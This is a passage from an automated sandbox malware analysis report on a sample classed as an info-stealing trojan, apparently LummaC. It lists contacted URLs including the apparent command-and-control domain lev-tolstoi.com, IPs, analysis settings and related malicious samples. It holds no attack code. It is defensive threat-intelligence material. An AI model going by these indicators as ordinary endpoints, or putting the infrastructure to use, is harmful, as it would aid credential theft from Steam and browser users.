                                                                                                                                        https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&amp;l=engji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D7000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2281187032.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2280751006.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                          		high
                                                                                                                                          https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&amp;l=english&amji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D7000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2281187032.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2280751006.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            		high
                                                                                                                                            https://www.google.com/recaptcha/ji2xlo1f.exe, 00000001.00000003.2242729272.00000000016A0000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              		high
                                                                                                                                              https://checkout.steampowered.com/ji2xlo1f.exe, 00000001.00000003.2242729272.00000000016A0000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                		high
                                                                                                                                                https://lev-tolstoi.com/n#ji2xlo1f.exe, 00000001.00000002.2585241320.00000000016EF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                		unknown
                                                                                                                                                https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696484494400800000.1&ci=1696484494189.12791&ctaji2xlo1f.exe, 00000001.00000003.2445952124.0000000003D1D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                  		high
                                                                                                                                                  https://community.fastly.steamstatic.com/public/javascript/applications/community/main.js?v=THDq-gsQji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D7000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2281187032.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2280751006.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2280774238.0000000001652000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    		high
                                                                                                                                                    https://store.steampowered.com/;ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      		high
                                                                                                                                                      https://store.steampowered.com/about/ji2xlo1f.exe, 00000001.00000003.2280751006.00000000016E1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        		high
                                                                                                                                                        https://steamcommunity.com/my/wishlist/ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D7000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2281187032.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2280751006.00000000016E1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          		high
                                                                                                                                                          https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&amp;ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D7000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2281187032.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2280751006.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            		high
                                                                                                                                                            https://help.steampowered.com/en/ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D7000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2281187032.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2280751006.00000000016E1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                              		high
                                                                                                                                                              https://steamcommunity.com/market/ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D7000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2281187032.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2280751006.00000000016E1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                		high
                                                                                                                                                                https://store.steampowered.com/news/ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D7000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2281187032.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2280751006.00000000016E1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                  		high
                                                                                                                                                                  https://lev-tolstoi.com/apiN#ji2xlo1f.exe, 00000001.00000002.2585241320.00000000016EF000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2506963341.00000000016F6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                                  		unknown
                                                                                                                                                                  https://lev-tolstoi.com/rsF#ji2xlo1f.exe, 00000001.00000002.2585241320.00000000016EF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                                  		unknown
                                                                                                                                                                  https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=ji2xlo1f.exe, 00000001.00000003.2308942550.0000000003D5C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                    		high
                                                                                                                                                                    https://lev-tolstoi.com/apimji2xlo1f.exe, 00000001.00000003.2483549945.00000000016D9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                    		unknown
                                                                                                                                                                    http://store.steampowered.com/subscriber_agreement/ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D7000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2281187032.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2483484833.00000000016E8000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2457835419.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2280751006.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2308329665.00000000016E2000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2280774238.0000000001652000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2458528884.00000000016E7000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2446810949.00000000016D9000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                      		high
                                                                                                                                                                      https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.orgji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D7000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2281187032.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2483484833.00000000016E8000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2457835419.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2280751006.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2308329665.00000000016E2000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2280774238.0000000001652000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2458528884.00000000016E7000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2446810949.00000000016D9000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                        		high
                                                                                                                                                                        https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpgji2xlo1f.exe, 00000001.00000003.2445952124.0000000003D1D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                          		high
                                                                                                                                                                          https://recaptcha.net/recaptcha/;ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                            		high
                                                                                                                                                                            https://lev-tolstoi.com/apixji2xlo1f.exe, 00000001.00000003.2483549945.00000000016D9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                                                            		unknown
                                                                                                                                                                            https://steamcommunity.com/discussions/ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D7000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2281187032.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2280751006.00000000016E1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                              		high
                                                                                                                                                                              https://store.steampowered.com/stats/ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D7000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2281187032.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2280751006.00000000016E1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                		high
                                                                                                                                                                                https://lev-tolstoi.com:443/api2ji2xlo1f.exe, 00000001.00000002.2584910256.0000000001672000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                                		unknown
                                                                                                                                                                                https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&amji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D7000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2281187032.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2280751006.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                  		high
                                                                                                                                                                                  https://medal.tvji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                    		high
                                                                                                                                                                                    https://broadcast.st.dl.eccdnx.comji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                      		high
                                                                                                                                                                                      https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.pngji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D7000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2281187032.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2280751006.00000000016E1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                        		high
                                                                                                                                                                                        https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&amp;l=english&aji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D7000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2281187032.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2280751006.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                          		high
                                                                                                                                                                                          https://store.steampowered.com/steam_refunds/ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D7000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2281187032.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2280751006.00000000016E1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                            		high
                                                                                                                                                                                            http://x1.c.lencr.org/0ji2xlo1f.exe, 00000001.00000003.2412610834.0000000003D60000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                              		high
                                                                                                                                                                                              http://x1.i.lencr.org/0ji2xlo1f.exe, 00000001.00000003.2412610834.0000000003D60000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                		high
                                                                                                                                                                                                https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchji2xlo1f.exe, 00000001.00000003.2308942550.0000000003D5C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  		high
                                                                                                                                                                                                  https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=Lj6X7NKUMfzk&aji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D7000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2281187032.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2280751006.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2280774238.0000000001652000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    		high
                                                                                                                                                                                                    https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900ji2xlo1f.exe, 00000001.00000003.2280751006.00000000016E1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      		high
                                                                                                                                                                                                      https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D7000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2281187032.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2280751006.00000000016E1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        		high
                                                                                                                                                                                                        https://community.fastly.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&amp;l=eji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D7000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2281187032.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2280751006.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          		high
                                                                                                                                                                                                          https://community.fastly.steamstatic.com/public/javascript/webui/clientcom.js?v=kOc26QwM0vlX&amp;l=eji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D7000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2281187032.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2280751006.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            		high
                                                                                                                                                                                                            https://steamcommunity.com/workshop/ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D7000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2281187032.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2280751006.00000000016E1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              		high
                                                                                                                                                                                                              https://login.steampowered.com/ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                		high
                                                                                                                                                                                                                https://support.mozilla.org/products/firefoxgro.allji2xlo1f.exe, 00000001.00000003.2413736446.0000000003E33000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                  		high
                                                                                                                                                                                                                  https://community.fastly.steamstatic.com/public/css/globalv2.css?v=hzEgqbtRcI5V&amp;l=english&amp;_cji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D7000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2281187032.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2280751006.00000000016E1000.00000004.00000020.00020000.00000000.sdmp, ji2xlo1f.exe, 00000001.00000003.2242682487.00000000016D1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                    		high

                                                                                                                                                                                                                    World Map of Contacted IPs

                                                                                                                                                                                                                    • No. of IPs < 25%
                                                                                                                                                                                                                    • 25% < No. of IPs < 50%
                                                                                                                                                                                                                    • 50% < No. of IPs < 75%
                                                                                                                                                                                                                    • 75% < No. of IPs

                                                                                                                                                                                                                    Public IPs

                                                                                                                                                                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                    104.21.66.86
                                                                                                                                                                                                                    		lev-tolstoi.comUnited States
                                                                                                                                                                                                                    		13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                    23.55.153.106
                                                                                                                                                                                                                    		steamcommunity.comUnited States
                                                                                                                                                                                                                    		20940AKAMAI-ASN1EUfalse

                                                                                                                                                                                                                    General Information

                                                                                                                                                                                                                    Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                                    Analysis ID:1577533
                                                                                                                                                                                                                    Start date and time:2024-12-18 15:16:38 +01:00
                                                                                                                                                                                                                    Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                    Overall analysis duration:0h 6m 35s
                                                                                                                                                                                                                    Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                    Report type:full
                                                                                                                                                                                                                    Cookbook file name:default.jbs
                                                                                                                                                                                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                                    Number of analysed new started processes analysed:15
                                                                                                                                                                                                                    Number of new started drivers analysed:0
                                                                                                                                                                                                                    Number of existing processes analysed:0
                                                                                                                                                                                                                    Number of existing drivers analysed:0
                                                                                                                                                                                                                    Number of injected processes analysed:0
                                                                                                                                                                                                                    Technologies:
                                                                                                                                                                                                                    • HCA enabled
                                                                                                                                                                                                                    • EGA enabled
                                                                                                                                                                                                                    • AMSI enabled
                                                                                                                                                                                                                    Analysis Mode:default
                                                                                                                                                                                                                    Analysis stop reason:Timeout
                                                                                                                                                                                                                    Sample name:ji2xlo1f.exe
                                                                                                                                                                                                                    Detection:MAL
                                                                                                                                                                                                                    Classification:mal100.troj.spyw.evad.winEXE@1/0@11/2
                                                                                                                                                                                                                    EGA Information:Failed
                                                                                                                                                                                                                    HCA Information:
                                                                                                                                                                                                                    • Successful, ratio: 100%
                                                                                                                                                                                                                    • Number of executed functions: 0
                                                                                                                                                                                                                    • Number of non-executed functions: 0
                                                                                                                                                                                                                    Cookbook Comments:
                                                                                                                                                                                                                    • Found application associated with file extension: .exe

                                                                                                                                                                                                                    Warnings

                                                                                                                                                                                                                    • Exclude process from analysis (whitelisted): dllhost.exe, BackgroundTransferHost.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, svchost.exe
                                                                                                                                                                                                                    • Excluded IPs from analysis (whitelisted): 20.198.119.143, 92.122.16.236, 20.190.181.0, 20.223.36.55, 13.107.246.63, 2.16.158.185, 4.175.87.197, 150.171.28.10, 20.74.19.45, 2.16.158.243, 20.223.35.26
                                                                                                                                                                                                                    • Excluded domains from analysis (whitelisted): www.bing.com, client.wns.windows.com, fs.microsoft.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, tse1.mm.bing.net, ctldl.windowsupdate.com, g.bing.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, fe3cr.delivery.mp.microsoft.com, wns.notify.trafficmanager.net, ocsp.digicert.com, login.live.com, e16604.g.akamaiedge.net, ocsp.edge.digicert.com, prod.fs.microsoft.com.akadns.net, wu-b-net.trafficmanager.net
                                                                                                                                                                                                                    • Execution Graph export aborted for target ji2xlo1f.exe, PID 4176 because there are no executed function
                                                                                                                                                                                                                    • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                                                                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                                    • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                                    • VT rate limit hit for: ji2xlo1f.exe

                                                                                                                                                                                                                    Simulations

                                                                                                                                                                                                                    Behavior and APIs

                                                                                                                                                                                                                    TimeTypeDescription
                                                                                                                                                                                                                    09:17:35API Interceptor13x Sleep call for process: ji2xlo1f.exe modified

                                                                                                                                                                                                                    Joe Sandbox View / Context

                                                                                                                                                                                                                    IPs

                                                                                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                    104.21.66.86MV ROCKET_PDA.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                                    • www.ayushigangwar.com/nqn4/?CJBlp=0Brh6Vr8UbBX&T2MpwT=59bmqUDXor7TXV4b71NCQ0d0nCVif23i1yH5+9ZmJc5hgCU7y+ZN9z0btTsWzGv6OrGw
                                                                                                                                                                                                                    23.55.153.106Armanivenntii_crypted_EASY.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                      aqbjn3fl.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                        aqbjn3fl.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                          zq6a1iqg.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                            v_dolg.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                              cccc2.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                CompleteStudio.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                  random.exe.6.exeGet hashmaliciousLummaC, Python Stealer, Amadey, LummaC Stealer, Monster Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                    alexshlu.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                      99awhy8l.exeGet hashmaliciousLummaCBrowse

                                                                                                                                                                                                                                        Domains

                                                                                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                        lev-tolstoi.comArmanivenntii_crypted_EASY.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                        • 172.67.157.254
                                                                                                                                                                                                                                        aqbjn3fl.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                        • 172.67.157.254
                                                                                                                                                                                                                                        aqbjn3fl.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                        • 172.67.157.254
                                                                                                                                                                                                                                        v_dolg.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                        • 172.67.157.254
                                                                                                                                                                                                                                        CompleteStudio.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                        • 104.21.66.86
                                                                                                                                                                                                                                        random.exe.6.exeGet hashmaliciousLummaC, Python Stealer, Amadey, LummaC Stealer, Monster Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                        • 172.67.157.254
                                                                                                                                                                                                                                        alexshlu.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                        • 172.67.157.254
                                                                                                                                                                                                                                        5_6253708004881862888.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                        • 104.21.66.86
                                                                                                                                                                                                                                        1fxm3u0d.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                        • 104.21.66.86
                                                                                                                                                                                                                                        2kudv4ea.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                        • 104.21.66.86
                                                                                                                                                                                                                                        bg.microsoft.map.fastly.netOrder_948575494759.xlsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                        • 199.232.214.172
                                                                                                                                                                                                                                        DocuStream_Scan_l8obgs3v.pdfGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                                                        • 199.232.214.172
                                                                                                                                                                                                                                        stail.exe.3.exeGet hashmaliciousSocks5SystemzBrowse
                                                                                                                                                                                                                                        • 199.232.214.172
                                                                                                                                                                                                                                        22TxDBB1.batGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                        • 199.232.214.172
                                                                                                                                                                                                                                        sxVHUOSqVC.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                        • 199.232.210.172
                                                                                                                                                                                                                                        pyld611114.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                        • 199.232.210.172
                                                                                                                                                                                                                                        Lu4421.exeGet hashmaliciousAsyncRAT, DcRat, StealeriumBrowse
                                                                                                                                                                                                                                        • 199.232.214.172
                                                                                                                                                                                                                                        do.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                        • 199.232.214.172
                                                                                                                                                                                                                                        Opdxdyeul.exeGet hashmaliciousSystemBCBrowse
                                                                                                                                                                                                                                        • 199.232.210.172
                                                                                                                                                                                                                                        YcxjdYUKIb.exeGet hashmaliciousPureCrypter, PureLog StealerBrowse
                                                                                                                                                                                                                                        • 199.232.210.172
                                                                                                                                                                                                                                        steamcommunity.comf86nrrc6.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                        • 104.102.49.254
                                                                                                                                                                                                                                        Armanivenntii_crypted_EASY.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                        • 23.55.153.106
                                                                                                                                                                                                                                        aqbjn3fl.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                        • 23.55.153.106
                                                                                                                                                                                                                                        aqbjn3fl.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                        • 23.55.153.106
                                                                                                                                                                                                                                        zq6a1iqg.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                        • 23.55.153.106
                                                                                                                                                                                                                                        v_dolg.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                        • 23.55.153.106
                                                                                                                                                                                                                                        cccc2.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                        • 23.55.153.106
                                                                                                                                                                                                                                        CompleteStudio.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                        • 23.55.153.106
                                                                                                                                                                                                                                        random.exe.6.exeGet hashmaliciousLummaC, Python Stealer, Amadey, LummaC Stealer, Monster Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                                                        • 23.55.153.106
                                                                                                                                                                                                                                        alexshlu.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                        • 23.55.153.106

                                                                                                                                                                                                                                        ASNs

                                                                                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                                        AKAMAI-ASN1EUArmanivenntii_crypted_EASY.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                        • 23.55.153.106
                                                                                                                                                                                                                                        aqbjn3fl.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                        • 23.55.153.106
                                                                                                                                                                                                                                        aqbjn3fl.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                        • 23.55.153.106
                                                                                                                                                                                                                                        http://www.mynylgbs.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                                                        • 23.195.38.175
                                                                                                                                                                                                                                        loligang.ppc.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                                                        • 96.17.102.118
                                                                                                                                                                                                                                        zq6a1iqg.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                        • 23.55.153.106
                                                                                                                                                                                                                                        v_dolg.exeGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                                                        • 23.55.153.106
                                                                                                                                                                                                                                        cccc2.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                                                        • 23.55.153.106
                                                                                                                                                                                                                                        CompleteStudio.exeGet hashmaliciousLummaCBrowse
